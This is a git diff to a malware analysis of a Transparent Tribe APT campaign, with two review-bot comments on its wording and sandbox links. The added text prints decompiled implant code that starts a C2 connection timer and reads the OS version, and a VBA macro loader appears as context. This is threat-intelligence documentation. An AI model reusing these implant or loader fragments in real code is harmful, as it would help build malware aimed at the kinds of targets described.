diff --git a/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md b/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md index b76780a..c767e66 100644 --- a/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md +++ b/Pakistan/APT/Transparent Tribe/22-01-20/analysis.md @@ -13,7 +13,7 @@ + [Ressources](#Ressources)

Malware analysis

-
The initial vector is a maldoc called ```"Criteria of Army Officers.doc" ```, this use a macro for extract and execute the PE file depends on the version of the operating system
+
The initial vector is from a decoy document probably shared from a spear-phishing, this document have two links for download additionnal informations. The both maldoc , this use a macro for extract and execute the PE file depends on the version of the operating system.
```vb Sub unMoferzip(Fname As Variant, FileNameFolder As Variant) @@ -23,6 +23,7 @@ Sub unMoferzip(Fname As Variant, FileNameFolder As Variant) Set oApp = CreateObject("Shell.Application") oApp.Namespace(FileNameFolder).CopyHere oApp.Namespace(Fname).items, &H4 End Sub + Sub MoferfileLdr() Dim path_Mofer_file As String Dim file_Mofer_name As String @@ -59,6 +60,41 @@ Sub MoferfileLdr() End Sub ``` +
The .NET implant begin to load the recon actions, push a timer for sleep the process and try to join the C2.
+ +```csharp +public void ulhtagniasdo_start() +{ + ulhtagniasCONF.ulhtagniasport = ulhtagniasCONF.ports[0]; + this.ulhtagniasrunTime = DateTime.Now; + this.ulhtagniasUPC = new ulhtagniasMYINF(); + this.ulhtagniasCMD = new ulhtagniasOCMD(this); + this.ulhtagniasHD.iserver = this; + this.ulhtagniasHD.ulhtagniasmainPath = ulhtagniasCONF.ulhtagniasget_mpath(); + TimerCallback callback = new TimerCallback(this.ulhtagniaslookup_connect); + System.Threading.Timer ulhtagniastimer = new System.Threading.Timer(callback, this.ulhtagniasStateObj, 32110, 36110); + this.ulhtagniasStateObj.ulhtagniastimer = ulhtagniastimer; +} +``` + +
Can read the Operation System
+ +```csharp +public static string ulhtagniasOsname() +{ + string result; + try + { + OperatingSystem osversion = Environment.OSVersion; + result = osversion.Version.Major.ToString() + ">" + osversion.Version.Minor.ToString(); + } + catch + {result = "6>1!ulhtagnias".Split(new char[]{'!'})[0];} + return result; +} +``` +
+

Threat Intelligence

Cyber kill chain

@@ -97,6 +133,8 @@ End Sub
Links Anyrun:
+* [Special Benefits.docx](https://app.any.run/tasks/37407c30-de54-423f-a468-5981c50ced6f) +* [7All Selected list.xls](https://app.any.run/tasks/db365b0c-883e-410c-975d-d14753a5bfb4) * [Criteria of Army Officers.doc](https://app.any.run/tasks/de93d3a4-9ff0-4bed-b492-1f45214a0443)
Resources :
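Review bot: the replacement sentence in the first hunk (`@@ -13,7 +13,7 @@`) is left unfinished: "The both maldoc , this use a macro for extract and execute the PE file" no longer says which documents carry the macro, and the removed line's filename `Criteria of Army Officers.doc` was the only thing tying the text to the `unMoferzip`/`MoferfileLdr` VBA that follows. Suggested wording: "The initial vector is a decoy document, probably delivered by spear-phishing, that contains two links to download additional information. Both downloaded maldocs use a macro to extract and execute a PE file chosen according to the operating system version." This also fixes "additionnal informations" and "from a spear-phishing".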
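Review bot: the two Any.run links added in the last hunk (`Special Benefits.docx`, `7All Selected list.xls`) are the first place these samples are named; the analysis text only alludes to "two links for download additionnal informations", so the filenames should be given there too, letting a reader connect the decoy, the two downloaded documents and the sandbox runs. Confirm whether the leading `7` in `7All Selected list.xls` is the real filename or a typo. Also, the context line `Resources :` here does not match the TOC entry `[Ressources](#Ressources)` shown in the first hunk's context; the heading and the anchor need the same spelling for the link to resolve.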